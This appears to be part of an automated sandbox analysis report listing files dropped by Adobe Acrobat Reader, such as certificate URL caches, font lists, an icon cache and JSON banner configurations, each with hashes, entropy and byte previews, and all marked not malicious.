                      Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):192
                      Entropy (8bit):2.7686775296558497
                      Encrypted:false
                      SSDEEP:
                      MD5:5685682ECDC765E3F09B7694D67667E7
                      SHA1:52FE017A1570EA9E716F4C74B517F4FB426AF59E
                      SHA-256:8AEB67B17AB761FC7A629A2911282590D3793195ACE05E0C5FC49D908EF46A57
                      SHA-512:59511BB72D71E8C26C594C2D9B279AC048016762CF1996A23F93000C709AB29AB1455160C15F2E67E781C2DCFE3517BE76A5B8CD89D1968C7BB02BB09908F727
                      Malicious:false
                      Reputation:unknown
                      Preview:p...... ........-...K..(....................................................... ..........W.....1..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:data
                      Category:modified
                      Size (bytes):328
                      Entropy (8bit):3.22045544633199
                      Encrypted:false
                      SSDEEP:
                      MD5:01597DD9F0492F35F09A4635331BE8B8
                      SHA1:26E8ADC9431FDB519AB689F594DBCC0711FD81E8
                      SHA-256:6FE27519636DD38EC1909DFAF73C84FBD959F95128FEE587A96CEE8AABC1D2B5
                      SHA-512:904F5B935912642C756E3B721BF6223F52FE5B971E1517AE75AD011682429D7C43E0ED02006A4010FF3B053BB049E8FDBA8D002A90F8BF94F7087119B2B25914
                      Malicious:false
                      Reputation:unknown
                      Preview:p...... .........3...K..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:PostScript document text
                      Category:dropped
                      Size (bytes):0
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:
                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                      Malicious:false
                      Reputation:unknown
                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.8180

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:PostScript document text
                      Category:dropped
                      Size (bytes):1233
                      Entropy (8bit):5.233980037532449
                      Encrypted:false
                      SSDEEP:
                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                      Malicious:false
                      Reputation:unknown
                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:PostScript document text
                      Category:dropped
                      Size (bytes):0
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:
                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                      Malicious:false
                      Reputation:unknown
                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:PostScript document text
                      Category:dropped
                      Size (bytes):0
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:
                      MD5:B60EE534029885BD6DECA42D1263BDC0
                      SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                      SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                      SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                      Malicious:false
                      Reputation:unknown
                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.8180

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:PostScript document text
                      Category:dropped
                      Size (bytes):10880
                      Entropy (8bit):5.214360287289079
                      Encrypted:false
                      SSDEEP:
                      MD5:B60EE534029885BD6DECA42D1263BDC0
                      SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                      SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                      SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                      Malicious:false
                      Reputation:unknown
                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):259864
                      Entropy (8bit):3.202660492858591
                      Encrypted:false
                      SSDEEP:
                      MD5:BE9BCC8BB2DB177C5D0157BDE4A1D3FE
                      SHA1:31836566F2EBE2EB88519AA3771D24DB439D9457
                      SHA-256:19D825CC20881511801CAA8DD9107805442C3B7685AF39FF16944287482659AD
                      SHA-512:6BB9C6B2AD532D72F5B5D687B8D9F04CFBB4DFC62294283DCE484928F20BCAFD21E61798F303FA3CF7288B10CF0F4A6AC2B83E17C55BE9E819A9960ABF61BDCE
                      Malicious:false
                      Reputation:unknown
                      Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):295
                      Entropy (8bit):5.344171186114478
                      Encrypted:false
                      SSDEEP:
                      MD5:8436ED576B862AA6C2E0CD1A1565082A
                      SHA1:F453F8DED3F5477F2E55F6AB3E96F707F08F8267
                      SHA-256:09E42150CC7238D7989E00DEBA43E0440C6403D3542419DC6C3E5A39B7E142BF
                      SHA-512:40873D1AFA263E5D581FC04DDF3353697571296642B3CD856CFC1BDAF9F3B65680BB7DCAEC9B5E556071387CC488BE0BFD93B2FB5722C23E1F205B8FDB228185
                      Malicious:false
                      Reputation:unknown
                      Preview:{"analyticsData":{"responseGUID":"f3d7f2a1-460d-452c-aee5-8ece19da552b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1734022711094,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):294
                      Entropy (8bit):5.287864020760833
                      Encrypted:false
                      SSDEEP:
                      MD5:6D1269CEA71ABC09BB9B8EA6A568E79E
                      SHA1:BD2E25CFCF00C0DA85728CCD51EE0CB7754DAB8C
                      SHA-256:F99F1D412519347CBA588F562CF88657E530C4DAAA91AF38B70DD5B0AF615D2F
                      SHA-512:59E2358B46D9B7779F5F16117E37EA1FA829AC56594C4AA8C085BAB2339639171504347F2F65B9C513A5A602523454171821F9BFE4197C0EA693A21F526E8293
                      Malicious:false
                      Reputation:unknown
                      Preview:{"analyticsData":{"responseGUID":"f3d7f2a1-460d-452c-aee5-8ece19da552b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1734022711094,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):294
                      Entropy (8bit):5.266943484965795
                      Encrypted:false
                      SSDEEP:
                      MD5:2F11B8FCA87DC850EC1FCCA5A730398F
                      SHA1:63B0468A5484FECC395F9B5EFAC2330CA7583DE2
                      SHA-256:4D0F7ED59CC5B18B2A6399DFF06E978A9C531EBCFEC959C291D7CABC0415D937
                      SHA-512:2ADEF0B4741E93A3FEB8018B112C2FA687EAA70ECAA518463216D81A621660FEEF9259BD4760234FA30B2B4E946A23D3607DEDD77DC7B388AE852B0791ABE2A5
                      Malicious:false
                      Reputation:unknown
                      Preview:{"analyticsData":{"responseGUID":"f3d7f2a1-460d-452c-aee5-8ece19da552b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1734022711094,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):285
                      Entropy (8bit):5.329594259344553
                      Encrypted:false
                      SSDEEP:
                      MD5:511F17C65C5B0EB4EE26600190C104A3
                      SHA1:49BD4010BA62F6154A4CC048D1495975B81F182A
                      SHA-256:DF5D423300591CBDD355A3A2367825B8AA02E41B078FD08352C0613976675173
                      SHA-512:290D1333EA73193F1A62844A6EF3717B252737346EE67C79556E0D5AEE67860393C7F6F6F9E7C8948825CB548C4BDC916EE81BBBAAC1E4884C1EA2CE933482D2
                      Malicious:false
                      Reputation:unknown
                      Preview:{"analyticsData":{"responseGUID":"f3d7f2a1-460d-452c-aee5-8ece19da552b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1734022711094,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):1123
                      Entropy (8bit):5.687977468194714
                      Encrypted:false
                      SSDEEP:
                      MD5:27EDBD66DEE6E8EBA478ED8E8DF6EA67
                      SHA1:13A51CF4FC9B193CD125B8A8DEC3F181098D2E2C
                      SHA-256:53653E88AFDAAC437AB1636B853AD29323D6C831B69885C89AD8CD4F744C9B97
                      SHA-512:E9C500E434987FC89BEB018578B2E3764E1B428543333BEAC5D5E825C0C20F491B003AB27A7349FECF30F9E24CC7E448760CEAEDE3877236FDFC97C83E23CBCD
                      Malicious:false
                      Reputation:unknown
                      Preview:{"analyticsData":{"responseGUID":"f3d7f2a1-460d-452c-aee5-8ece19da552b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1734022711094,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):289
                      Entropy (8bit):5.275708914747644
                      Encrypted:false
                      SSDEEP:
                      MD5:A7DE0DC9FEEB91C17F121F9943CADBFB
                      SHA1:8E07288D7289F5F7159E11F0C0A4DD76F1E00866
                      SHA-256:192296E66262363117252BDB3B3D823498283C2A337AB53FFB3DF5E9F957E2BF
                      SHA-512:1668A32308811574FB3CDC336444CCDBC7326C8E93C65AF15F71EFC6F2B8001F8649B5DDA7605EA3B2EEEF353319140307232FCCE35893D25866307FF90F5F2E
                      Malicious:false
                      Reputation:unknown
                      Preview:{"analyticsData":{"responseGUID":"f3d7f2a1-460d-452c-aee5-8ece19da552b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1734022711094,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):292
                      Entropy (8bit):5.276687893828557
                      Encrypted:false
                      SSDEEP:
                      MD5:65E61694D9C1F1E32A0CA8FC17B982A5
                      SHA1:F7BFF3954B8023DDBA0E03641D731429BDF9B616
                      SHA-256:976643A51091303C509E4849B3B9A78D43191EA8FC144E5C5DCEDA07B02CB913
                      SHA-512:F9EE2C7F97FFD67296F2263125DDDC29816535C942E0FC0E6B4D4E1DFFE64BAD212F58336F99EDE1A28F8C09DCEDEDFC850415BC5A7020BA0F011F9B5209B55E
                      Malicious:false
                      Reputation:unknown
                      Preview:{"analyticsData":{"responseGUID":"f3d7f2a1-460d-452c-aee5-8ece19da552b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1734022711094,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):289
                      Entropy (8bit):5.284801737722694
                      Encrypted:false
                      SSDEEP:
                      MD5:145956ED544D547FAAB77F592E9B5F00
                      SHA1:82EC144E04C0CC48BDF21E8D9BE5F5D6980105D1
                      SHA-256:515C9613A1721DD8F69A76D1937BC819A7139345E2C1576F7D45C65481056AA1
                      SHA-512:D961DA1400B824BA4620BD2EB2B2DCBAE9CE3E1E05E150A28F265E6EE80A21B0558C608833A05696BE48AC60AF2B2F1D74CD4D4FB1FCD5636B73AA4A156C46EB
                      Malicious:false
                      Reputation:unknown
                      Preview:{"analyticsData":{"responseGUID":"f3d7f2a1-460d-452c-aee5-8ece19da552b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1734022711094,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):295
                      Entropy (8bit):5.301533844893368
                      Encrypted:false
                      SSDEEP:
                      MD5:6783FB4AE2D099542145DBA48A7C9B0A
                      SHA1:734B7B5CADD4E9E3EE1F3EA49329479792036527
                      SHA-256:254BC613EB8EBD8749144591064E32940B2835E0CB7668B0C8BBDC2762097E3C
                      SHA-512:7B60C37A4D03112C20F78D9236CFDF337E16262A11A36AE7686F86E097F17D3F6A1506679BE5A318C8E62BD8B12ED32F222ECC2E18182B64F381C3B9BFCC6F5E
                      Malicious:false
                      Reputation:unknown
                      Preview:{"analyticsData":{"responseGUID":"f3d7f2a1-460d-452c-aee5-8ece19da552b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1734022711094,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):289
                      Entropy (8bit):5.282084896831793
                      Encrypted:false
                      SSDEEP:
                      MD5:9C5CBED385EB5A3436D0AC44BCE3F1DF
                      SHA1:233D7AC9BA06CC727FFFC63DB37FFF76F1B8B108
                      SHA-256:8B07D5598D89C64A74B000D5E42B7A0578708A1A8D3A2610E6EEECED16682872
                      SHA-512:B303FB1C65AD67B1687344311152F1AE54534ADEC29210EEDFE29C87571C3067B0D0440B263A2D9FA9A2CC20D0DC6DAD75C8C8163D987EAF200AEF445172EC16
                      Malicious:false
                      Reputation:unknown
                      Preview:{"analyticsData":{"responseGUID":"f3d7f2a1-460d-452c-aee5-8ece19da552b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1734022711094,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):284
                      Entropy (8bit):5.268668703898406
                      Encrypted:false
                      SSDEEP:
                      MD5:B2870B19536993AD76B0A8C3189C3618
                      SHA1:278C71CFCA7942170CAB9C2CDC149DD479426BE9
                      SHA-256:71D45C8E5988CAE4F47055314E097792FAA2C3E668C75C3CFF75FFD7E93BEBD0
                      SHA-512:8C40610CC0C6CBDF287E4EBC2AC8788F32E4253A9B7AC2B1A5EBBEB9A9BD3441AA96CFF50A8D6FF8C75B0A2A7F1B0CE8F6921D3D08756A9927602C890D3E8CDE
                      Malicious:false
                      Reputation:unknown
                      Preview:{"analyticsData":{"responseGUID":"f3d7f2a1-460d-452c-aee5-8ece19da552b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1734022711094,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):291
                      Entropy (8bit):5.265755122362482
                      Encrypted:false
                      SSDEEP:
                      MD5:08DB48BD0A7E1A272148F50C56A768CF
                      SHA1:BB8E5BFC7CC817B55DE5C169D69B1DB029657D23
                      SHA-256:377C216780659661ACAF32BEBE24E826065B4552202AD4A5F218430CF8D50B0A
